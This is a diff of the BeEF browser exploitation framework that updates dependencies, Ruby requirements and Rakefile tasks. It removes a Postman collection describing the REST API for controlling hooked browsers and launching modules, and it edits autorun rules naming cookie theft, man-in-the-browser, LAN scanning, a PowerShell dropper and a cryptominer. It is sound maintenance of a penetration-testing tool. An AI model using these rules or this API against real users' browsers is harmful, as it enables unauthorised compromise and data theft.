+    uri (1.1.1)
+    webrick (1.9.1)
+    websocket (1.2.11)
+    websocket-client-simple (0.6.1)
       event_emitter
       websocket
-    xmlrpc (0.3.2)
+    xmlrpc (0.3.3)
       webrick
     xpath (3.2.0)
       nokogiri (~> 1.8)
 
 PLATFORMS
-  x86_64-linux
+  aarch64-linux-gnu
+  aarch64-linux-musl
+  arm-linux-gnu
+  arm-linux-musl
+  arm64-darwin
+  x86_64-darwin
+  x86_64-linux-gnu
+  x86_64-linux-musl
 
 DEPENDENCIES
-  ansi
-  async-dns
+  activerecord (~> 8.1)
+  ansi (~> 1.5)
+  async (~> 1.32)
+  async-dns (~> 1.4)
   browserstack-local (~> 1.4)
-  capybara
-  curb
-  domain_name (>= 0.5.20190701)
-  em-websocket
-  erubis
-  espeak-ruby (>= 1.0.4)
-  eventmachine
-  execjs
-  geckodriver-helper
-  irb
+  capybara (~> 3.40)
+  curb (~> 1.2)
+  em-websocket (~> 0.5.3)
+  erubis (~> 2.7)
+  espeak-ruby (~> 1.1.0)
+  eventmachine (~> 1.2, >= 1.2.7)
+  execjs (~> 2.10)
+  geckodriver-helper (~> 0.24.0)
+  irb (~> 1.16)
   json
-  maxmind-db
-  mime-types
-  msfrpc-client
+  maxmind-db (~> 1.4)
+  mime-types (~> 3.7)
+  msfrpc-client (~> 1.1, >= 1.1.2)
   net-smtp
-  otr-activerecord (>= 1.4.2)
-  parseconfig
-  pry-byebug
-  qr4r
-  rack (>= 2.2.4)
-  rack-protection (>= 2.2.0)
-  rake (>= 13.0)
-  rdoc
-  rest-client (>= 2.1.0)
-  rspec
-  rubocop (~> 1.36.0)
-  rubyzip (>= 1.2.2)
-  rushover
-  selenium-webdriver
-  sinatra (>= 2.2.0)
-  slack-notifier
-  sqlite3
+  otr-activerecord (~> 2.6.0)
+  parseconfig (~> 1.1, >= 1.1.2)
+  pry-byebug (~> 3.12)
+  qr4r (~> 0.6.1)
+  rack (~> 3.2)
+  rack-protection (~> 4.2.1)
+  rake (~> 13.3)
+  rdoc (~> 7.1)
+  rest-client (~> 2.1.0)
+  rspec (~> 3.13)
+  rubocop (~> 1.82.1)
+  rubyzip (~> 3.2)
+  rushover (~> 0.3.0)
+  selenium-webdriver (~> 4.40)
+  sinatra (~> 4.1)
+  slack-notifier (~> 2.4)
+  sqlite3 (~> 2.9)
   term-ansicolor
-  test-unit
-  test-unit-full
-  thin
-  twitter (>= 7.0.0)
-  uglifier (>= 4.2.0)
-  unf
-  websocket-client-simple (~> 0.6.0)
-  xmlrpc
+  test-unit-full (~> 0.0.5)
+  thin (~> 2.0)
+  uglifier (~> 4.2)
+  websocket-client-simple (~> 0.6.1)
+  xmlrpc (~> 0.3.3)
 
 BUNDLED WITH
-   2.3.14
+   2.7.2

INSTALL.txt

@@ -1,7 +1,7 @@
 ===============================================================================
    
-    Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - https://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
@@ -21,9 +21,9 @@ Or cloning the Git repository from Github:
 Prerequisites
 --------------
 
-BeEF requires Ruby 2.7+.
+BeEF requires Ruby 3.0+.
 
-If your operating system package manager does not support Ruby version 2.7,
+If your operating system package manager does not support Ruby version 3.0,
 you can add the brightbox ppa repository for the latest version of Ruby:
 
   $ sudo apt-add-repository -y ppa:brightbox/ruby-ng

README.md

@@ -1,7 +1,7 @@
 ===============================================================================
 
-    Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - https://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
@@ -30,13 +30,13 @@ __Security Bugs:__ security@beefproject.com
 
 __Twitter:__ [@beefproject](https://twitter.com/beefproject)
 
-__Discord:__ https://discord.gg/ugmKmHarKc
+__Discord:__ https://discord.gg/25wT2P8pwx
 
 Requirements
 ------------
 
 * Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
-* [Ruby](https://www.ruby-lang.org): 2.7 or newer
+* [Ruby](https://www.ruby-lang.org): 3.0 or newer
 * [SQLite](http://sqlite.org): 3.x
 * [Node.js](https://nodejs.org): 10 or newer
 * The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile

RESTful-API.postman_collection.json

@@ -1,567 +0,0 @@
-{
-	"info": {
-		"_postman_id": "3b47c3ff-c03f-446c-8edb-cacaab481425",
-		"name": "RESTful API",
-		"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
-	},
-	"item": [
-		{
-			"name": "Authentication",
-			"event": [
-				{
-					"listen": "test",
-					"script": {
-						"id": "8e1a5f48-1d41-469d-a153-6cd5ee751912",
-						"exec": [
-							"var jsonData = JSON.parse(responseBody);",
-							"pm.environment.set(\"token\", jsonData.token);"
-						],
-						"type": "text/javascript"
-					}
-				}
-			],
-			"request": {
-				"method": "POST",
-				"header": [
-					{
-						"key": "Content-Type",
-						"name": "Content-Type",
-						"value": "application/json",
-						"type": "text"
-					}
-				],
-				"body": {
-					"mode": "raw",
-					"raw": "{\n\t\"username\": \"{{username}}\",\n\t\"password\": \"{{password}}\"\n\t\n}",
-					"options": {
-						"raw": {
-							"language": "json"
-						}
-					}
-				},
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/admin/login",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"admin",
-						"login"
-					]
-				},
-				"description": "In order to use the API, a token parameter must always be added to requests, otherwise a 401 error (Not Authorized) is returned.\n\nA new pseudo-random token is generated each time BeEF starts, using BeEF::Core::Crypto::api_token. The token is added to the BeEF::Configuration object.\n\nWhen BeEF starts the token is printed to the console. It should look something like:\n\n[16:02:47][*] RESTful API key: 320f3cf4da7bf0df7566a517c5db796e73a23f47\nGrabbing the Token from BeEF's API\n\nYou can issue a POST request to /api/admin/login using the BeEF credentials you have set in the main config.yaml file. This request will return the token in the response. You can parse the JSON and use it for your next requests requiring authentication."
-			},
-			"response": []
-		},
-		{
-			"name": "Get All Hooked Browsers",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/hooks?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"hooks"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Provides information (browser and OS version, cookies, enabled plugins, etc) about all hooked browsers (both online and offline)."
-			},
-			"response": []
-		},
-		{
-			"name": "Get Specific Hooked Browser",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/hooks/{{session}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"hooks",
-						"{{session}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "\n    Provides information (browser and OS version, cookies, enabled plugins, etc) about a specific hooked browser.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "Get All Hooked Browsers Logs",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/logs?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"logs"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "The logs handler gives information about all hooked browser's logs, both global and relative."
-			},
-			"response": []
-		},
-		{
-			"name": "Get Specific Hooked Browsers Logs",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/logs/{{session}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"logs",
-						"{{session}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": " The logs handler gives information about a specified hooked browser's logs.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "List All Command Modules",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "List all available BeEF command modules."
-			},
-			"response": []
-		},
-		{
-			"name": "Get Information on Specific Module",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules/{{module_id}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules",
-						"{{module_id}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Get detailed information about a specific BeEF command module.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "Launch Command Module on a Specific Browser",
-			"request": {
-				"method": "POST",
-				"header": [
-					{
-						"key": "Content-Type",
-						"name": "Content-Type",
-						"value": "application/json",
-						"type": "text"
-					}
-				],
-				"body": {
-					"mode": "raw",
-					"raw": "",
-					"options": {
-						"raw": {
-							"language": "json"
-						}
-					}
-				},
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules",
-						"{{session}}",
-						"{{module_id}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Launch a specific BeEF command module on a given hooked browser.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "Return Information About Previously Executed Module",
-			"protocolProfileBehavior": {
-				"disableBodyPruning": true
-			},
-			"request": {
-				"method": "GET",
-				"header": [
-					{
-						"key": "Content-Type",
-						"name": "Content-Type",
-						"value": "application/json",
-						"type": "text"
-					}
-				],
-				"body": {
-					"mode": "raw",
-					"raw": "",
-					"options": {
-						"raw": {
-							"language": "json"
-						}
-					}
-				},
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}/{{cmd_id}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules",
-						"{{session}}",
-						"{{module_id}}",
-						"{{cmd_id}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Returns information about a specific previously launched BeEF command module.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "Send a Metasploit Module",
-			"request": {
-				"method": "POST",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules/{{session}}/{{module_id}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules",
-						"{{session}}",
-						"{{module_id}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Launch a specific Metasploit module on a given hooked browser\n"
-			},
-			"response": []
-		},
-		{
-			"name": " Send a Module to Multiple Hooked Browsers",
-			"request": {
-				"method": "POST",
-				"header": [
-					{
-						"key": "Content-Type",
-						"name": "Content-Type",
-						"value": "application/json",
-						"type": "text"
-					}
-				],
-				"body": {
-					"mode": "raw",
-					"raw": "",
-					"options": {
-						"raw": {
-							"language": "json"
-						}
-					}
-				},
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules/multi_browser?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules",
-						"multi_browser"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Fire a new command module to multiple hooked browsers. Returns the command IDs of the launched module, or 0 if firing got issues."
-			},
-			"response": []
-		},
-		{
-			"name": " Send Multiple Modules to a Single Hooked Browser",
-			"request": {
-				"method": "POST",
-				"header": [
-					{
-						"key": "Content-Type",
-						"name": "Content-Type",
-						"value": "application/json",
-						"type": "text"
-					}
-				],
-				"body": {
-					"mode": "raw",
-					"raw": "",
-					"options": {
-						"raw": {
-							"language": "json"
-						}
-					}
-				},
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/modules/multi_module?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"modules",
-						"multi_module"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Fire multiple command modules to a single hooked browser. Returns the command IDs of the launched modules, or 0 if firing got issues."
-			},
-			"response": []
-		},
-		{
-			"name": "List the DNS ruleset",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/dns/ruleset?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"dns",
-						"ruleset"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Returns the current set of DNS rules.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "List a Specific DNS Rule",
-			"request": {
-				"method": "GET",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"dns",
-						"rule",
-						"{{dnsrule_id}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Returns an individual DNS rule given its unique id.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "Add a New DNS Rule",
-			"request": {
-				"method": "POST",
-				"header": [
-					{
-						"key": "Content-Type",
-						"name": "Content-Type",
-						"value": "application/json",
-						"type": "text"
-					}
-				],
-				"body": {
-					"mode": "raw",
-					"raw": "",
-					"options": {
-						"raw": {
-							"language": "json"
-						}
-					}
-				},
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/dns/rule?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"dns",
-						"rule"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Adds a new DNS rule or \"resource record\". Does nothing if rule is already present.\n"
-			},
-			"response": []
-		},
-		{
-			"name": "Remove an Existing DNS Rule",
-			"request": {
-				"method": "DELETE",
-				"header": [],
-				"url": {
-					"raw": "http://{{hostname}}:3000/api/dns/rule/{{dnsrule_id}}?token={{token}}",
-					"protocol": "http",
-					"host": [
-						"{{hostname}}"
-					],
-					"port": "3000",
-					"path": [
-						"api",
-						"dns",
-						"rule",
-						"{{dnsrule_id}}"
-					],
-					"query": [
-						{
-							"key": "token",
-							"value": "{{token}}"
-						}
-					]
-				},
-				"description": "Removes an individual DNS rule with a specified unique ID.\n"
-			},
-			"response": []
-		}
-	],
-	"protocolProfileBehavior": {}
-}

Rakefile

@@ -1,28 +1,27 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-require 'yaml'
-require 'bundler/setup'
-load 'tasks/otr-activerecord.rake'
-#require 'pry-byebug'
-
-
-task :default => ["spec"]
-
-desc 'Generate API documentation to doc/rdocs/index.html'
-task :rdoc do
-  Rake::Task['rdoc:rerdoc'].invoke
-end
-
-## RSPEC
 require 'rspec/core/rake_task'
 
-RSpec::Core::RakeTask.new(:spec) do |task|
+task :default => ["short"]
+
+RSpec::Core::RakeTask.new(:short) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack', '--tag ~run_on_long_tests']
+end
+
+RSpec::Core::RakeTask.new(:long) do |task|
   task.rspec_opts = ['--tag ~run_on_browserstack']
 end
 
+RSpec::Core::RakeTask.new(:long_only) do |task|
+  task.rspec_opts = ['--tag ~run_on_browserstack', '--tag run_on_long_tests']
+end
+
+################################
+# Browserstack
+
 RSpec::Core::RakeTask.new(:browserstack) do |task|
   task.rspec_opts = ['--tag run_on_browserstack']
 end
@@ -55,7 +54,7 @@ namespace :ssl do
     end
     Rake::Task['ssl:replace'].invoke
   end
-
+  
   desc 'Re-generate SSL certificate'
   task :replace do
     if File.file?('/usr/local/bin/openssl')
@@ -70,6 +69,14 @@ namespace :ssl do
   end
 end
 
+################################
+# Generate API documentation
+
+desc 'Generate API documentation to doc/rdocs/index.html'
+task :rdoc do
+  Rake::Task['rdoc:rerdoc'].invoke
+end
+
 ################################
 # rdoc
 
@@ -88,15 +95,6 @@ namespace :rdoc do
   end
 end
 
-
-################################
-# Install
-
-#task :install do
-#  sh "export BEEF_TEST=true"
-#end
-
-
 ################################
 # X11 set up
 
@@ -124,7 +122,6 @@ end
 @beef_process_id = nil;
 @beef_config_file = 'tmp/rk_beef_conf.yaml';
 
-
 task :beef_start => 'beef' do
   # read environment param for creds or use bad_fred
   test_user = ENV['TEST_BEEF_USER'] || 'bad_fred'
@@ -134,7 +131,7 @@ task :beef_start => 'beef' do
   config = YAML.safe_load(File.read('./config.yaml'))
   config['beef']['credentials']['user'] = test_user
   config['beef']['credentials']['passwd'] = test_pass
-  Dir.mkdir('tmp') unless Dir.exists?('tmp')
+  Dir.mkdir('tmp') unless Dir.exist?('tmp')
   File.open(@beef_config_file, 'w') { |f| YAML.dump(config, f) }
 
   # set the environment creds -- in case we're using bad_fred
@@ -199,61 +196,6 @@ file '/tmp/msf-test/msfconsole' do
   sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
 end
 
-
-################################
-# Create Mac DMG File
-
-task :dmg do
-  puts "\nCreating Working Directory\n";
-  sh "mkdir dmg";
-  sh "mkdir dmg/BeEF";
-  sh "rsync * dmg/BeEF --exclude=dmg -r";
-  sh "ln -s /Applications dmg/";
-  puts "\nCreating DMG File\n"
-  sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
-  puts "\nCleaning Up\n"
-  sh "rm -r dmg";
-  puts "\nBeEF.dmg created\n"
-end
-
-
-################################
-# Create CDE Package
-# This will download and make the CDE Executable and
-# gnereate a CDE Package in cde-package
-
-task :cde do
-  puts "\nCloning and Making CDE...";
-  sh "git clone git://github.com/pgbovine/CDE.git";
-  Dir.chdir "CDE";
-  sh "make";
-  Dir.chdir "..";
-  puts "\nCreating CDE Package...\n";
-  sh "bundle install"
-  Rake::Task['cde_beef_start'].invoke
-  Rake::Task['beef_stop'].invoke
-  puts "\nCleaning Up...\n";
-  sleep (2);
-  sh "rm -rf CDE";
-  puts "\nCDE Package Created...\n";
-end
-
-################################
-# CDE/BeEF environment set up
-
-@beef_process_id = nil;
-
-task :cde_beef_start => 'beef' do
-  printf "Starting CDE BeEF (wait 10 seconds)..."
-  @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5, 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
-    printf '.'
-    sleep (i)
-  end
-  puts '.'
-end
-
 ################################
 # ActiveRecord
 namespace :db do

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.5.4.0
+0.6.0.0

arerules/alert.json

@@ -1,9 +1,5 @@
 {"name": "Display an alert",
   "author": "mgeeky",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "alert_dialog",
       "condition": null,

arerules/coinhive_miner.json

@@ -1,20 +0,0 @@
-{"name": "Start CoinHive JavaScript miner",
-  "author": "bcoles",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
-  "modules": [
-    {"name": "coinhive_miner",
-      "condition": null,
-      "options": {
-        "public_token":"Ofh5MIvjuCBDqwJ9TCTio7TYko0ig5TV",
-        "mode":"FORCE_EXCLUSIVE_TAB",
-        "mobile_enabled":""
-      }
-    }
-  ],
-  "execution_order": [0],
-  "execution_delay": [0],
-  "chain_mode": "sequential"
-}

arerules/confirm_close_tab.json

@@ -1,9 +1,5 @@
 {"name": "Confirm Close Tab",
   "author": "mgeeky",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "confirm_close_tab",
       "condition": null,

arerules/ff_osx_extension-dropper.json

@@ -2,7 +2,6 @@
   "name": "Firefox Extension Dropper",
   "author": "antisnatchor",
   "browser": "FF",
-  "browser_version": "ALL",
   "os": "OSX",
   "os_version": ">= 10.8",
   "modules": [{
@@ -17,4 +16,4 @@
   "execution_order": [0],
   "execution_delay": [0],
   "chain_mode": "sequential"
-}
+}

arerules/get_cookie.json

@@ -1,10 +1,6 @@
 {
   "name": "Get Cookie",
   "author": "@benichmt1",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_cookie",
       "condition": null,

arerules/ie_win_htapowershell.json

@@ -2,7 +2,6 @@
   "name": "HTA PowerShell",
   "author": "antisnatchor",
   "browser": "IE",
-  "browser_version": "ALL",
   "os": "Windows",
   "os_version": ">= 7",
   "modules": [

arerules/lan_cors_scan.json

@@ -1,9 +1,6 @@
 {"name": "LAN CORS Scan",
   "author": "bcoles",
   "browser": ["FF", "C"],
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/lan_cors_scan_common.json

@@ -1,9 +1,5 @@
 {"name": "LAN CORS Scan (Common IPs)",
   "author": "bcoles",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "cross_origin_scanner_cors",
       "condition": null,

arerules/lan_fingerprint.json

@@ -1,9 +1,6 @@
 {"name": "LAN Fingerprint",
   "author": "bcoles",
   "browser": ["FF", "C"],
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/lan_fingerprint_common.json

@@ -1,9 +1,5 @@
 {"name": "LAN Fingerprint (Common IPs)",
   "author": "antisnatchor",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "internal_network_fingerprinting",
       "condition": null,

arerules/lan_flash_scan.json

@@ -1,9 +1,6 @@
 {"name": "LAN Flash Scan",
   "author": "bcoles",
   "browser": ["FF", "C"],
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/lan_flash_scan_common.json

@@ -1,9 +1,6 @@
 {"name": "LAN Flash Scan (Common IPs)",
   "author": "bcoles",
   "browser": ["FF", "C"],
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "cross_origin_scanner_flash",
       "condition": null,

arerules/lan_http_scan.json

@@ -1,9 +1,6 @@
 {"name": "LAN HTTP Scan",
   "author": "bcoles",
   "browser": ["FF", "C"],
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/lan_http_scan_common.json

@@ -1,9 +1,5 @@
 {"name": "LAN HTTP Scan (Common IPs)",
   "author": "bcoles",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_http_servers",
       "condition": null,

arerules/lan_ping_sweep.json

@@ -1,9 +1,6 @@
 {"name": "LAN Ping Sweep",
   "author": "bcoles",
   "browser": "FF",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/lan_ping_sweep_common.json

@@ -1,9 +1,6 @@
 {"name": "LAN Ping Sweep (Common IPs)",
   "author": "bcoles",
   "browser": "FF",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "ping_sweep",
       "condition": null,

arerules/lan_port_scan.json

@@ -1,9 +1,5 @@
 {"name": "LAN Port Scan",
   "author": "aburro & aussieklutz",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/lan_sw_port_scan.json

@@ -1,9 +1,5 @@
 {"name": "LAN SW Port Scan",
   "author": "aburro & aussieklutz",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "get_internal_ip_webrtc",
       "condition": null,

arerules/man_in_the_browser.json

@@ -1,9 +1,5 @@
 {"name": "Perform Man-In-The-Browser",
   "author": "mgeeky",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "man_in_the_browser",
       "condition": null,

arerules/raw_javascript.json

@@ -1,10 +1,6 @@
 {
   "name": "Raw JavaScript",
   "author": "wade@bindshell.net",
-  "browser": "ALL",
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "raw_javascript",
       "condition": null,

arerules/record_snapshots.json

@@ -1,9 +1,5 @@
 {"name": "Collects multiple snapshots of the webpage within Same-Origin",
   "author": "mgeeky",
-  "browser": ["FF", "C", "O", "IE", "S"],
-  "browser_version": "ALL",
-  "os": "ALL",
-  "os_version": "ALL",
   "modules": [
     {"name": "spyder_eye",
       "condition": null,

arerules/win_fake_malware.json

@@ -2,10 +2,7 @@
 {
   "name": "Windows Fake Malware",
   "author": "bcoles",
-  "browser": "ALL",
-  "browser_version": "ALL",
   "os": "Windows",
-  "os_version": "ALL",
   "modules": [
     {
       "name": "blockui",

beef

@@ -1,8 +1,8 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -12,9 +12,9 @@
 $VERBOSE = nil
 
 #
-# @note Version check to ensure BeEF is running Ruby 2.7+
+# @note Version check to ensure BeEF is running Ruby 3.0+
 #
-min_ruby_version = '2.7'
+min_ruby_version = '3.0'
 if RUBY_VERSION < min_ruby_version
   puts
   puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version #{min_ruby_version} or later."
@@ -39,6 +39,10 @@ $root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '
 $:.unshift($root_dir)
 $home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
 
+# @note Parse BeEF CLI options early (prevents Rack help from taking over)
+require 'core/main/console/commandline'
+BeEF::Core::Console::CommandLine.parse
+
 #
 # @note Require core loader
 #
@@ -185,7 +189,7 @@ db_file = config.get('beef.database.file')
 if BeEF::Core::Console::CommandLine.parse[:resetdb]
   print_info 'Resetting the database for BeEF.'
   begin
-    File.delete(db_file) if File.exists?(db_file)
+    File.delete(db_file) if File.exist?(db_file)
   rescue => e
     print_error("Could not remove '#{db_file}' database file: #{e.message}")
     exit(1)
@@ -194,7 +198,6 @@ end
 
 # Connect to DB
 ActiveRecord::Base.logger = nil
-OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
 OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
 # otr-activerecord require you to manually establish the connection with the following line
 #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems.
@@ -203,10 +206,13 @@ if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2')
 end
 
 # Migrate (if required)
-context = ActiveRecord::Migration.new.migration_context
+ActiveRecord::Migration.verbose = false # silence activerecord migration stdout messages
+ActiveRecord::Migrator.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
+context = ActiveRecord::MigrationContext.new(ActiveRecord::Migrator.migrations_paths)
 if context.needs_migration?
-  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
+  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration, context.internal_metadata).migrate
 end
+
 #
 # @note Extensions may take a moment to load, thus we print out a please wait message
 #
